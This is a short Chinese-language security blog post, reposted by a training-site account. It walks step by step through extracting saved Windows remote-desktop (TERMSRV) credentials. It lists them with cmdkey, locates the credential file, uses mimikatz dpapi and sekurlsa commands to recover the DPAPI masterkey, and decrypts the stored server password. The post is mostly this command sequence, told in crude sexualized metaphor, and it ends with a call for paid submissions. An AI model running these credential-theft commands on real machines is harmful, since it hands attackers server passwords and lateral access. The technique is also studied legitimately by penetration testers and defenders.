查看原文
其他

破解远程终端凭据,获取服务器密码

2017-10-11 合天智汇


测试环境:windows 10


道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的大棒饥渴难耐了。


但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解带。


0x01 凭据管理器中查看Windows凭据:TERMSRV/1xx.xxx.xxx.xx2


可通过命令行获取,执行: cmdkey /list
注意:该命令务必在Session会话下执行,system下执行无结果。



0x02 凭据存储在用户目录下:

C:\Users\<username>\AppData\Local\Microsoft\Credentials\*

图中名为"FF359429D6F19C64BA7D3E282558EEB5"的文件即为目标凭据:TERMSRV/1xx.xxx.xxx.xx2的存储文件


0x03 执行:

mimikatz "dpapi::cred /in:C:\Users\xx\
AppData\Local\Microsoft\Credentials\FF
359429D6F19C64BA7D3E282558EEB5"

pbData是凭据的加密数据,guidMasterKey是凭据的GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}。


0x04 执行:

mimikatz privilege::debug sekurlsa::dpapi

根据目标凭据GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。



0x05 拿到了MasterKey,服务器密码便唾手可得。执行解密命令:

mimikatz "dpapi::cred /in:C:\Users\xx\
AppData\Local\Microsoft\Credentials\FF
359429D6F19C64BA7D3E282558EEB5
/masterkey:28d1f3252c019f9cxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx16dcec8e5dbf5cd0"

解密出来的CredentialBlob即为凭据TERMSRV/1xx.xxx.xxx.xx2的服务器密码。


参考:
http://www.freebuf.com/articles/network/146460.html


本文转自tools作者:Anonymous

别忘了投稿哟!!!

合天公众号开启原创投稿啦!!!

大家有好的技术原创文章。

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧!



您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存